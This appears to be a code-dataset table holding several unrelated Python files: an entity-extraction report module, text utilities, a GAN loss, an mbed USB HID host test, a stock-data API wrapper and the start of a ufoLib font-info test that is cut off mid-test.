content stringlengths 5 1.05M |
|---|
import sys
import logging
module_logger = logging.getLogger('hypercane.report.entities')
def get_document_entities(urim, cache_storage, entity_types):
import spacy
from nltk.corpus import stopwords
from hypercane.utils import get_boilerplate_free_content
module_logger.debug("starting entity extraction process for {}".format(urim))
content = get_boilerplate_free_content(urim, cache_storage=cache_storage)
nlp = spacy.load("en_core_web_sm")
doc = nlp(content.decode('utf8'))
entities = []
for ent in doc.ents:
if ent.label_ in entity_types:
entities.append(ent.text.strip().replace('\n', ' ').lower())
return entities
def generate_entities(urimlist, cache_storage, entity_types):
import concurrent.futures
import nltk
corpus_entities = []
document_frequency = {}
completed_count = 0
# with concurrent.futures.ProcessPoolExecutor(max_workers=5) as executor:
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_urim = { executor.submit(get_document_entities, urim, cache_storage, entity_types): urim for urim in urimlist }
for future in concurrent.futures.as_completed(future_to_urim):
urim = future_to_urim[future]
try:
document_entities = future.result()
corpus_entities.extend( document_entities )
for entity in list(set(document_entities)):
document_frequency.setdefault(entity, 0)
document_frequency[entity] += 1
except Exception as exc:
module_logger.exception("URI-M [{}] generated an exception [{}], skipping...".format(urim, repr(exc)))
completed_count += 1
if completed_count % 100 == 0:
module_logger.info("extracted entities from ({}/{}) mementos".format(completed_count, len(urimlist)))
module_logger.info("discovered {} entities in corpus".format(len(corpus_entities)))
fdist = nltk.FreqDist(corpus_entities)
tf = []
for term in fdist:
tf.append( (fdist[term], term) )
module_logger.info("calculated {} term frequencies".format(len(tf)))
returned_terms = []
for entry in sorted(tf, reverse=True):
entity = entry[1]
frequency_in_corpus = entry[0]
probability_in_corpus = float(entry[0])/float(len(tf))
inverse_document_frequency = document_frequency[entity] / len(urimlist)
corpus_tfidf = entry[0] * (document_frequency[entity] / len(urimlist))
returned_terms.append( (
entity, frequency_in_corpus, probability_in_corpus,
document_frequency[entity], inverse_document_frequency,
corpus_tfidf
) )
return returned_terms
|
"""Utility functions for working with text."""
from __future__ import division, unicode_literals
import re
_BASE62_CHARS = \
'0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
_SPLIT_RE = re.compile(r'\s*,+\s*')
def base62_encode(value):
"""Return a base62-encoded string representing a numeric value.
Args:
value (int):
The number to encode. This must be a positive number.
Returns:
bytes:
The base62-encoded string.
"""
if value == 0:
return b'0'
assert value > 0
encoded = []
while value > 0:
value, remainder = divmod(value, 62)
encoded.append(_BASE62_CHARS[remainder])
encoded.reverse()
return ''.join(encoded).encode('ascii')
def split_comma_separated(s):
"""Return a list of values from a comma-separated string.
Any blank values will be filtered out.
Args:
s (unicode):
The string to split.
Returns:
list of unicode:
The list of values.
"""
return [
item
for item in _SPLIT_RE.split(s)
if item
]
|
import torch
from torch import nn
import torchvision
class GeneratorLoss(nn.Module):
def __init__(self):
super(GeneratorLoss, self).__init__()
vgg = torchvision.models.vgg16(pretrained=True)
self.vgg_network = nn.Sequential(*vgg.features).eval()
self.mse_loss = nn.MSELoss()
# loss factors
self.adversarial_loss_factor = 0.5
self.mse_loss_factor = 1.0
self.vgg_loss_factor = 1.0
self.tv_loss_factor = 1e-4
def forward(self, fake_out, fake_img, real_img):
adversarial_loss = -torch.log(fake_out)
mse_loss = self.mse_loss(fake_img, real_img)
vgg_loss = self.mse_loss(
self.vgg_network(fake_img), self.vgg_network(real_img))
tv_loss = self.tv_loss(fake_img)
return self.vgg_loss_factor * vgg_loss \
+ self.adversarial_loss_factor * adversarial_loss \
+ self.mse_loss_factor * mse_loss \
+ self.tv_loss_factor * tv_loss
def tv_loss(self, x, tv_loss_weight=1):
batch_size = x.size()[0]
h_x = x.size()[2]
w_x = x.size()[3]
count_h = self._tensor_size(x[:, :, 1:, :])
count_w = self._tensor_size(x[:, :, :, 1:])
h_tv = torch.pow((x[:, :, 1:, :] - x[:, :, :h_x - 1, :]), 2).sum()
w_tv = torch.pow((x[:, :, :, 1:] - x[:, :, :, :w_x - 1]), 2).sum()
return tv_loss_weight * 2 * (h_tv / count_h + w_tv / count_w) / batch_size
def _tensor_size(self, t):
return t.size()[1] * t.size()[2] * t.size()[3]
class DiscriminatorLoss(nn.Module):
def __init__(self):
super(DiscriminatorLoss, self).__init__()
def forward(self, fake_out, real_out):
return - torch.log(real_out) - torch.log(1 - fake_out)
|
"""
mbed SDK
Copyright (c) 2019 ARM Limited
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import functools
import time
import threading
import uuid
import sys
import mbed_host_tests
import usb.core
from usb.util import (
CTRL_IN,
CTRL_OUT,
CTRL_TYPE_STANDARD,
CTRL_TYPE_CLASS,
CTRL_RECIPIENT_DEVICE,
CTRL_RECIPIENT_INTERFACE,
DESC_TYPE_CONFIG,
build_request_type)
if sys.platform.startswith('win'):
# Use libusb0 on Windows. libusb1 implementation for Windows
# does not support all features necessary for testing.
import usb.backend.libusb0
USB_BACKEND = usb.backend.libusb0.get_backend()
else:
# Use a default backend on other platforms.
USB_BACKEND = None
try:
import hid
except ImportError:
CYTHON_HIDAPI_PRESENT = False
else:
CYTHON_HIDAPI_PRESENT = True
# USB device -- device classes
USB_CLASS_HID = 0x03
# USB device -- standard requests
USB_REQUEST_GET_DESCRIPTOR = 0x06
# USB device -- HID class requests
HID_REQUEST_GET_REPORT = 0x01
HID_REQUEST_SET_REPORT = 0x09
HID_REQUEST_GET_IDLE = 0x02
HID_REQUEST_SET_IDLE = 0x0A
HID_REQUEST_GET_PROTOCOL = 0x03
HID_REQUEST_SET_PROTOCOL = 0x0B
# USB device -- HID class descriptors
DESC_TYPE_HID_HID = 0x21
DESC_TYPE_HID_REPORT = 0x22
DESC_TYPE_HID_PHYSICAL = 0x23
# USB device -- HID class descriptor lengths
DESC_LEN_HID_HID = 0x09
# USB device -- descriptor fields offsets
DESC_OFFSET_BLENGTH = 0
DESC_OFFSET_BDESCRIPTORTYPE = 1
# USB device -- HID subclasses
HID_SUBCLASS_NONE = 0
HID_SUBCLASS_BOOT = 1
# USB device -- HID protocols
HID_PROTOCOL_NONE = 0
HID_PROTOCOL_KEYBOARD = 1
HID_PROTOCOL_MOUSE = 2
# Greentea message keys used for callbacks
MSG_KEY_DEVICE_READY = 'dev_ready'
MSG_KEY_HOST_READY = 'host_ready'
MSG_KEY_SERIAL_NUMBER = 'usb_dev_sn'
MSG_KEY_TEST_GET_DESCRIPTOR_HID = 'test_get_desc_hid'
MSG_KEY_TEST_GET_DESCRIPTOR_CFG = 'test_get_desc_cfg'
MSG_KEY_TEST_REQUESTS = 'test_requests'
MSG_KEY_TEST_RAW_IO = 'test_raw_io'
# Greentea message keys used to notify DUT of test status
MSG_KEY_TEST_CASE_FAILED = 'fail'
MSG_KEY_TEST_CASE_PASSED = 'pass'
MSG_VALUE_DUMMY = '0'
MSG_VALUE_NOT_SUPPORTED = 'not_supported'
# Constants for the tests.
KEYBOARD_IDLE_RATE_TO_SET = 0x00 # Duration = 0 (indefinite)
HID_PROTOCOL_TO_SET = 0x01 # Protocol = 1 (Report Protocol)
RAW_IO_REPS = 16 # Number of loopback test reps.
def build_get_desc_value(desc_type, desc_index):
"""Build and return a wValue field for control requests."""
return (desc_type << 8) | desc_index
def usb_hid_path(serial_number):
"""Get a USB HID device system path based on the serial number."""
if not CYTHON_HIDAPI_PRESENT:
return None
for device_info in hid.enumerate(): # pylint: disable=no-member
if device_info.get('serial_number') == serial_number: # pylint: disable=not-callable
return device_info['path']
return None
def get_descriptor_types(desc):
"""Return a list of all bDescriptorType values found in desc.
desc is expected to be a sequence of bytes, i.e. array.array('B')
returned from usb.core.
From the USB 2.0 spec, paragraph 9.5:
Each descriptor begins with a byte-wide field that contains the total
number of bytes in the descriptor followed by a byte-wide field that
identifies the descriptor type.
"""
tmp_desc = desc[DESC_OFFSET_BLENGTH:]
desc_types = []
while True:
try:
bLength = tmp_desc[DESC_OFFSET_BLENGTH] # pylint: disable=invalid-name
bDescriptorType = tmp_desc[DESC_OFFSET_BDESCRIPTORTYPE] # pylint: disable=invalid-name
desc_types.append(int(bDescriptorType))
tmp_desc = tmp_desc[int(bLength):]
except IndexError:
break
return desc_types
def get_hid_descriptor_parts(hid_descriptor):
"""Return bNumDescriptors, bDescriptorType, wDescriptorLength from hid_descriptor."""
err_msg = 'Invalid HID class descriptor'
try:
if hid_descriptor[1] != DESC_TYPE_HID_HID:
raise TypeError(err_msg)
bNumDescriptors = int(hid_descriptor[5]) # pylint: disable=invalid-name
bDescriptorType = int(hid_descriptor[6]) # pylint: disable=invalid-name
wDescriptorLength = int((hid_descriptor[8] << 8) | hid_descriptor[7]) # pylint: disable=invalid-name
except (IndexError, ValueError):
raise TypeError(err_msg)
return bNumDescriptors, bDescriptorType, wDescriptorLength
def get_usbhid_dev_type(intf):
"""Return a name of the HID device class type for intf."""
if not isinstance(intf, usb.core.Interface):
return None
if intf.bInterfaceClass != USB_CLASS_HID:
# USB Device Class Definition for HID, v1.11, paragraphs 4.1, 4.2 & 4.3:
# the class is specified in the Interface descriptor
# and not the Device descriptor.
return None
if (intf.bInterfaceSubClass == HID_SUBCLASS_BOOT
and intf.bInterfaceProtocol == HID_PROTOCOL_KEYBOARD):
return 'boot_keyboard'
if (intf.bInterfaceSubClass == HID_SUBCLASS_BOOT
and intf.bInterfaceProtocol == HID_PROTOCOL_MOUSE):
return 'boot_mouse'
# Determining any other HID dev type, like a non-boot_keyboard or
# a non-boot_mouse requires getting and parsing a HID Report descriptor
# for intf.
# Only the boot_keyboard, boot_mouse and other_device are used for this
# greentea test suite.
return 'other_device'
class RetryError(Exception):
"""Exception raised by retry_fun_call()."""
def retry_fun_call(fun, num_retries=3, retry_delay=0.0):
"""Call fun and retry if any exception was raised.
fun is called at most num_retries with a retry_dalay in between calls.
Raises RetryError if the retry limit is exhausted.
"""
verbose = False
final_err = None
for retry in range(1, num_retries + 1):
try:
return fun() # pylint: disable=not-callable
except Exception as exc: # pylint: disable=broad-except
final_err = exc
if verbose:
print('Retry {}/{} failed ({})'
.format(retry, num_retries, str(fun)))
time.sleep(retry_delay)
err_msg = 'Failed with "{}". Tried {} times.'
raise RetryError(err_msg.format(final_err, num_retries))
def raise_if_different(expected, actual, text=''):
"""Raise a RuntimeError if actual is different than expected."""
if expected != actual:
raise RuntimeError('{}Got {!r}, expected {!r}.'.format(text, actual, expected))
def raise_if_false(expression, text):
"""Raise a RuntimeError if expression is False."""
if not expression:
raise RuntimeError(text)
class USBHIDTest(mbed_host_tests.BaseHostTest):
"""Host side test for USB device HID class."""
@staticmethod
def get_usb_hid_path(usb_id_str):
"""Get a USB HID device path as registered in the system.
Search is based on the unique USB SN generated by the host
during test suite setup.
Raises RuntimeError if the device is not found.
"""
hid_path = usb_hid_path(usb_id_str)
if hid_path is None:
err_msg = 'USB HID device (SN={}) not found.'
raise RuntimeError(err_msg.format(usb_id_str))
return hid_path
@staticmethod
def get_usb_dev(usb_id_str):
"""Get a usb.core.Device instance.
Search is based on the unique USB SN generated by the host
during test suite setup.
Raises RuntimeError if the device is not found.
"""
usb_dev = usb.core.find(custom_match=lambda d: d.serial_number == usb_id_str, backend=USB_BACKEND)
if usb_dev is None:
err_msg = 'USB device (SN={}) not found.'
raise RuntimeError(err_msg.format(usb_id_str))
return usb_dev
def __init__(self):
super(USBHIDTest, self).__init__()
self.__bg_task = None
self.dut_usb_dev_sn = uuid.uuid4().hex # 32 hex digit string
def notify_error(self, msg):
"""Terminate the test with an error msg."""
self.log('TEST ERROR: {}'.format(msg))
self.notify_complete(None)
def notify_failure(self, msg):
"""Report a host side test failure to the DUT."""
self.log('TEST FAILED: {}'.format(msg))
self.send_kv(MSG_KEY_TEST_CASE_FAILED, MSG_VALUE_DUMMY)
def notify_success(self, value=None, msg=''):
"""Report a host side test success to the DUT."""
if msg:
self.log('TEST PASSED: {}'.format(msg))
if value is None:
value = MSG_VALUE_DUMMY
self.send_kv(MSG_KEY_TEST_CASE_PASSED, value)
def cb_test_get_hid_desc(self, key, value, timestamp):
"""Verify the device handles Get_Descriptor request correctly.
Two requests are tested for every HID interface:
1. Get_Descriptor(HID),
2. Get_Descriptor(Report).
Details in USB Device Class Definition for HID, v1.11, paragraph 7.1.
"""
kwargs_hid_desc_req = {
'bmRequestType': build_request_type(
CTRL_IN, CTRL_TYPE_STANDARD, CTRL_RECIPIENT_INTERFACE),
'bRequest': USB_REQUEST_GET_DESCRIPTOR,
# Descriptor Index (part of wValue) is reset to zero for
# HID class descriptors other than Physical ones.
'wValue': build_get_desc_value(DESC_TYPE_HID_HID, 0x00),
# wIndex is replaced with the Interface Number in the loop.
'wIndex': None,
'data_or_wLength': DESC_LEN_HID_HID}
kwargs_report_desc_req = {
'bmRequestType': build_request_type(
CTRL_IN, CTRL_TYPE_STANDARD, CTRL_RECIPIENT_INTERFACE),
'bRequest': USB_REQUEST_GET_DESCRIPTOR,
# Descriptor Index (part of wValue) is reset to zero for
# HID class descriptors other than Physical ones.
'wValue': build_get_desc_value(DESC_TYPE_HID_REPORT, 0x00),
# wIndex is replaced with the Interface Number in the loop.
'wIndex': None,
# wLength is replaced with the Report Descriptor Length in the loop.
'data_or_wLength': None}
mbed_hid_dev = None
report_desc_lengths = []
try:
mbed_hid_dev = retry_fun_call(
fun=functools.partial(self.get_usb_dev, self.dut_usb_dev_sn), # pylint: disable=not-callable
num_retries=20,
retry_delay=0.05)
except RetryError as exc:
self.notify_error(exc)
return
try:
for intf in mbed_hid_dev.get_active_configuration(): # pylint: disable=not-callable
if intf.bInterfaceClass != USB_CLASS_HID:
continue
try:
if mbed_hid_dev.is_kernel_driver_active(intf.bInterfaceNumber):
mbed_hid_dev.detach_kernel_driver(intf.bInterfaceNumber) # pylint: disable=not-callable
except (NotImplementedError, AttributeError):
pass
# Request the HID descriptor.
kwargs_hid_desc_req['wIndex'] = intf.bInterfaceNumber
hid_desc = mbed_hid_dev.ctrl_transfer(**kwargs_hid_desc_req) # pylint: disable=not-callable
try:
bNumDescriptors, bDescriptorType, wDescriptorLength = get_hid_descriptor_parts(hid_desc) # pylint: disable=invalid-name
except TypeError as exc:
self.notify_error(exc)
return
raise_if_different(1, bNumDescriptors, 'Exactly one HID Report descriptor expected. ')
raise_if_different(DESC_TYPE_HID_REPORT, bDescriptorType, 'Invalid HID class descriptor type. ')
raise_if_false(wDescriptorLength > 0, 'Invalid HID Report descriptor length. ')
# Request the Report descriptor.
kwargs_report_desc_req['wIndex'] = intf.bInterfaceNumber
kwargs_report_desc_req['data_or_wLength'] = wDescriptorLength
report_desc = mbed_hid_dev.ctrl_transfer(**kwargs_report_desc_req) # pylint: disable=not-callable
raise_if_different(wDescriptorLength, len(report_desc),
'The size of data received does not match the HID Report descriptor length. ')
report_desc_lengths.append(len(report_desc))
except usb.core.USBError as exc:
self.notify_failure('Get_Descriptor request failed. {}'.format(exc))
except RuntimeError as exc:
self.notify_failure(exc)
else:
# Send the report desc len to the device.
# USBHID::report_desc_length() returns uint16_t
msg_value = '{0:04x}'.format(max(report_desc_lengths))
self.notify_success(msg_value)
def cb_test_get_cfg_desc(self, key, value, timestamp):
"""Verify the device provides required HID descriptors.
USB Device Class Definition for HID, v1.11, paragraph 7.1:
When a Get_Descriptor(Configuration) request is issued, it
returns (...), and the HID descriptor for each interface.
"""
kwargs_cfg_desc_req = {
'bmRequestType': build_request_type(
CTRL_IN, CTRL_TYPE_STANDARD, CTRL_RECIPIENT_DEVICE),
'bRequest': USB_REQUEST_GET_DESCRIPTOR,
# Descriptor Index (part of wValue) is reset to zero.
'wValue': build_get_desc_value(DESC_TYPE_CONFIG, 0x00),
# wIndex is reset to zero.
'wIndex': 0x00,
# wLength unknown, set to 1024.
'data_or_wLength': 1024}
mbed_hid_dev = None
try:
mbed_hid_dev = retry_fun_call(
fun=functools.partial(self.get_usb_dev, self.dut_usb_dev_sn), # pylint: disable=not-callable
num_retries=20,
retry_delay=0.05)
except RetryError as exc:
self.notify_error(exc)
return
try:
# Request the Configuration descriptor.
cfg_desc = mbed_hid_dev.ctrl_transfer(**kwargs_cfg_desc_req) # pylint: disable=not-callable
raise_if_false(DESC_TYPE_HID_HID in get_descriptor_types(cfg_desc),
'No HID class descriptor in the Configuration descriptor.')
except usb.core.USBError as exc:
self.notify_failure('Get_Descriptor request failed. {}'.format(exc))
except RuntimeError as exc:
self.notify_failure(exc)
else:
self.notify_success()
def cb_test_class_requests(self, key, value, timestamp):
"""Verify all required HID requests are supported.
USB Device Class Definition for HID, v1.11, Appendix G:
1. Get_Report -- required for all types,
2. Set_Report -- not required if dev doesn't declare an Output Report,
3. Get_Idle -- required for keyboards,
4. Set_Idle -- required for keyboards,
5. Get_Protocol -- required for boot_keyboard and boot_mouse,
6. Set_Protocol -- required for boot_keyboard and boot_mouse.
Details in USB Device Class Definition for HID, v1.11, paragraph 7.2.
"""
kwargs_get_report_request = {
'bmRequestType': build_request_type(
CTRL_IN, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
'bRequest': HID_REQUEST_GET_REPORT,
# wValue: ReportType = Input, ReportID = 0 (not used)
'wValue': (0x01 << 8) | 0x00,
# wIndex: InterfaceNumber (defined later)
'wIndex': None,
# wLength: unknown, set to 1024
'data_or_wLength': 1024}
kwargs_get_idle_request = {
'bmRequestType': build_request_type(
CTRL_IN, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
'bRequest': HID_REQUEST_GET_IDLE,
# wValue: 0, ReportID = 0 (not used)
'wValue': (0x00 << 8) | 0x00,
# wIndex: InterfaceNumber (defined later)
'wIndex': None,
'data_or_wLength': 1}
kwargs_set_idle_request = {
'bmRequestType': build_request_type(
CTRL_OUT, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
'bRequest': HID_REQUEST_SET_IDLE,
# wValue: Duration, ReportID = 0 (all input reports)
'wValue': (KEYBOARD_IDLE_RATE_TO_SET << 8) | 0x00,
# wIndex: InterfaceNumber (defined later)
'wIndex': None,
'data_or_wLength': 0}
kwargs_get_protocol_request = {
'bmRequestType': build_request_type(
CTRL_IN, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
'bRequest': HID_REQUEST_GET_PROTOCOL,
'wValue': 0x00,
# wIndex: InterfaceNumber (defined later)
'wIndex': None,
'data_or_wLength': 1}
kwargs_set_protocol_request = {
'bmRequestType': build_request_type(
CTRL_OUT, CTRL_TYPE_CLASS, CTRL_RECIPIENT_INTERFACE),
'bRequest': HID_REQUEST_SET_PROTOCOL,
'wValue': HID_PROTOCOL_TO_SET,
# wIndex: InterfaceNumber (defined later)
'wIndex': None,
'data_or_wLength': 0}
mbed_hid_dev = None
try:
mbed_hid_dev = retry_fun_call(
fun=functools.partial(self.get_usb_dev, self.dut_usb_dev_sn), # pylint: disable=not-callable
num_retries=20,
retry_delay=0.05)
except RetryError as exc:
self.notify_error(exc)
return
hid_dev_type = None
tested_request_name = None
try:
for intf in mbed_hid_dev.get_active_configuration(): # pylint: disable=not-callable
hid_dev_type = get_usbhid_dev_type(intf)
if hid_dev_type is None:
continue
try:
if mbed_hid_dev.is_kernel_driver_active(intf.bInterfaceNumber):
mbed_hid_dev.detach_kernel_driver(intf.bInterfaceNumber) # pylint: disable=not-callable
except (NotImplementedError, AttributeError):
pass
if hid_dev_type == 'boot_keyboard':
# 4. Set_Idle
tested_request_name = 'Set_Idle'
kwargs_set_idle_request['wIndex'] = intf.bInterfaceNumber
mbed_hid_dev.ctrl_transfer(**kwargs_set_idle_request) # pylint: disable=not-callable
# 3. Get_Idle
tested_request_name = 'Get_Idle'
kwargs_get_idle_request['wIndex'] = intf.bInterfaceNumber
idle_rate = mbed_hid_dev.ctrl_transfer(**kwargs_get_idle_request) # pylint: disable=not-callable
raise_if_different(KEYBOARD_IDLE_RATE_TO_SET, idle_rate, 'Invalid idle rate received. ')
if hid_dev_type in ('boot_keyboard', 'boot_mouse'):
# 6. Set_Protocol
tested_request_name = 'Set_Protocol'
kwargs_set_protocol_request['wIndex'] = intf.bInterfaceNumber
mbed_hid_dev.ctrl_transfer(**kwargs_set_protocol_request) # pylint: disable=not-callable
# 5. Get_Protocol
tested_request_name = 'Get_Protocol'
kwargs_get_protocol_request['wIndex'] = intf.bInterfaceNumber
protocol = mbed_hid_dev.ctrl_transfer(**kwargs_get_protocol_request) # pylint: disable=not-callable
raise_if_different(HID_PROTOCOL_TO_SET, protocol, 'Invalid protocol received. ')
# 1. Get_Report
tested_request_name = 'Get_Report'
kwargs_get_report_request['wIndex'] = intf.bInterfaceNumber
mbed_hid_dev.ctrl_transfer(**kwargs_get_report_request) # pylint: disable=not-callable
except usb.core.USBError as exc:
self.notify_failure('The {!r} does not support the {!r} HID class request ({}).'
.format(hid_dev_type, tested_request_name, exc))
except RuntimeError as exc:
self.notify_failure('Set/Get data mismatch for {!r} for the {!r} HID class request ({}).'
.format(hid_dev_type, tested_request_name, exc))
else:
self.notify_success()
def raw_loopback(self, report_size):
"""Send every input report back to the device."""
mbed_hid_path = None
mbed_hid = hid.device()
try:
mbed_hid_path = retry_fun_call(
fun=functools.partial(self.get_usb_hid_path, self.dut_usb_dev_sn), # pylint: disable=not-callable
num_retries=20,
retry_delay=0.05)
retry_fun_call(
fun=functools.partial(mbed_hid.open_path, mbed_hid_path), # pylint: disable=not-callable
num_retries=10,
retry_delay=0.05)
except RetryError as exc:
self.notify_error(exc)
return
# Notify the device it can send reports now.
self.send_kv(MSG_KEY_HOST_READY, MSG_VALUE_DUMMY)
try:
for _ in range(RAW_IO_REPS):
# There are no Report ID tags in the Report descriptor.
# Receiving only the Report Data, Report ID is omitted.
report_in = mbed_hid.read(report_size)
report_out = report_in[:]
# Set the Report ID to 0x00 (not used).
report_out.insert(0, 0x00)
mbed_hid.write(report_out)
except (ValueError, IOError) as exc:
self.notify_failure('HID Report transfer failed. {}'.format(exc))
finally:
mbed_hid.close()
def setup(self):
self.register_callback(MSG_KEY_DEVICE_READY, self.cb_device_ready)
self.register_callback(MSG_KEY_TEST_GET_DESCRIPTOR_HID, self.cb_test_get_hid_desc)
self.register_callback(MSG_KEY_TEST_GET_DESCRIPTOR_CFG, self.cb_test_get_cfg_desc)
self.register_callback(MSG_KEY_TEST_REQUESTS, self.cb_test_class_requests)
self.register_callback(MSG_KEY_TEST_RAW_IO, self.cb_test_raw_io)
def cb_device_ready(self, key, value, timestamp):
"""Send a unique USB SN to the device.
DUT uses this SN every time it connects to host as a USB device.
"""
self.send_kv(MSG_KEY_SERIAL_NUMBER, self.dut_usb_dev_sn)
def start_bg_task(self, **thread_kwargs):
"""Start a new daemon thread.
Some callbacks delegate HID dev handling to a background task to
prevent any delays in the device side assert handling. Only one
background task is kept running to prevent multiple access
to the HID device.
"""
try:
self.__bg_task.join()
except (AttributeError, RuntimeError):
pass
self.__bg_task = threading.Thread(**thread_kwargs)
self.__bg_task.daemon = True
self.__bg_task.start()
def cb_test_raw_io(self, key, value, timestamp):
"""Receive HID reports and send them back to the device."""
if not CYTHON_HIDAPI_PRESENT:
self.send_kv(MSG_KEY_HOST_READY, MSG_VALUE_NOT_SUPPORTED)
return
try:
# The size of input and output reports used in test.
report_size = int(value)
except ValueError as exc:
self.notify_error(exc)
return
self.start_bg_task(
target=self.raw_loopback,
args=(report_size, ))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time-stamp: <2017-01-06 17:03:39 Friday by wls81>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time-stamp: <2013-09-06 00:43:23 Friday by zhangguhua>
# @version 1.0
# @author your name
import os
import tushare as ts
import cPickle as pickle
# 数据存储路径
data_path = os.path.dirname(os.path.abspath(__file__)) + '/data'
class TushareAPI:
"""
tushare的功能封装,常用到一些函数
"""
def __init__(self, init_file=None):
"""初始化函数
:param init_file: 加载的初始化文件
:returns: None
:rtype: NoneType
"""
# 存储所有股票信息列表
self.market_info = None
market_info_file = data_path + ("/.market_info")
# 存储股票代码列表
self.code_list = []
code_list_file = data_path + ("/.code_list")
# 存储股票名称列表
self.name_list = []
name_list_file = data_path + ("/.name_list")
try:
with open(market_info_file) as mif, open(code_list_file) as clf, open(name_list_file) as nlf :
self.market_info = pickle.load(mif)
self.code_list = pickle.load(clf)
self.name_list = pickle.load(nlf)
except :
self.market_info = ts.get_today_all()
self.code_list = self.market_info[['code', 'name']]['code'].tolist()
self.name_list = self.market_info[['code', 'name']]['name'].tolist()
with open(market_info_file, 'wb') as mif, open(code_list_file, 'wb') as clf, open(name_list_file, 'wb') as nlf:
pickle.dump(self.market_info, mif)
pickle.dump(self.code_list, clf)
pickle.dump(self.name_list, nlf)
def varifi_code(self, code):
"""判断股票代码是否存在
:param code: 需要查询的股票代码
:returns: 代码存在返回True否则返回False
:rtype: bool
"""
return code in self.code_list
def varifi_name(self, name):
"""判断股票名称是否存在
:param name: 需要查询的股票名称
:returns: 名称存在返回True否则返回False
:rtype: bool
"""
return name in self.name_list
def get_stock_info(self, query):
"""获取股票的实时信息
:param query: 6位数字股票代码,或者指数代码(sh=上证指数 sz=深圳成指 hs300=沪深300指数 sz50=上证50 zxb=中小板 cyb=创业板)\
可输入的类型:str、list、set或者pandas的Series对象
:returns: 返回股票信息的dict
:rtype: dict
"""
info = ts.get_realtime_quotes(query)
return info.to_dict()
def get_stock_price(self, query):
stock_info = self.get_stock_info(query)
return stock_info['price']
if __name__ == "__main__":
tsAPI = TushareAPI()
print tsAPI.varifi_code("000333")
print tsAPI.get_stock_info('000333')
print tsAPI.get_stock_info(['000333','002038'])
print tsAPI.get_stock_price('000333')
print tsAPI.get_stock_price(['000333','002038'])
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import shutil
import unittest
import tempfile
from io import open
from ufoLib import UFOReader, UFOWriter, UFOLibError
from ufoLib.glifLib import GlifLibError
from ufoLib.plistlib import readPlist, writePlist
from ufoLib.test.testSupport import fontInfoVersion3
class TestInfoObject(object): pass
# --------------
# fontinfo.plist
# --------------
class ReadFontInfoVersion3TestCase(unittest.TestCase):
def setUp(self):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
metaInfo = {
"creator": "test",
"formatVersion": 3
}
path = os.path.join(self.dstDir, "metainfo.plist")
with open(path, "wb") as f:
writePlist(metaInfo, f)
def tearDown(self):
shutil.rmtree(self.dstDir)
def _writeInfoToPlist(self, info):
path = os.path.join(self.dstDir, "fontinfo.plist")
with open(path, "wb") as f:
writePlist(info, f)
def testRead(self):
originalData = dict(fontInfoVersion3)
self._writeInfoToPlist(originalData)
infoObject = TestInfoObject()
reader = UFOReader(self.dstDir)
reader.readInfo(infoObject)
readData = {}
for attr in list(fontInfoVersion3.keys()):
readData[attr] = getattr(infoObject, attr)
self.assertEqual(originalData, readData)
def testGenericRead(self):
# familyName
info = dict(fontInfoVersion3)
info["familyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# styleName
info = dict(fontInfoVersion3)
info["styleName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# styleMapFamilyName
info = dict(fontInfoVersion3)
info["styleMapFamilyName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# styleMapStyleName
## not a string
info = dict(fontInfoVersion3)
info["styleMapStyleName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
## out of range
info = dict(fontInfoVersion3)
info["styleMapStyleName"] = "REGULAR"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# versionMajor
info = dict(fontInfoVersion3)
info["versionMajor"] = "1"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# versionMinor
info = dict(fontInfoVersion3)
info["versionMinor"] = "0"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["versionMinor"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# copyright
info = dict(fontInfoVersion3)
info["copyright"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# trademark
info = dict(fontInfoVersion3)
info["trademark"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# unitsPerEm
info = dict(fontInfoVersion3)
info["unitsPerEm"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["unitsPerEm"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
info = dict(fontInfoVersion3)
info["unitsPerEm"] = -1.0
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
